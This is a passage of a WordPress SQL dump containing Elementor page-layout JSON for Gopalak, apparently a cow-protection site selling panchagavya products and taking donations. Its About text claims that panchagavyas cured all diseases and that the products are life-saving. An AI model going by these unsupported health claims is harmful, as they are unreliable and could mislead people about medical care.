ypography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12337,2022,'_elementor_page_assets','a:0:{}'),(12340,2023,'_elementor_edit_mode','builder'),(12341,2023,'_elementor_template_type','wp-page'),(12342,2023,'_elementor_version','3.7.8'),(12343,2023,'_wp_page_template','elementor_canvas'),(12344,2023,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the 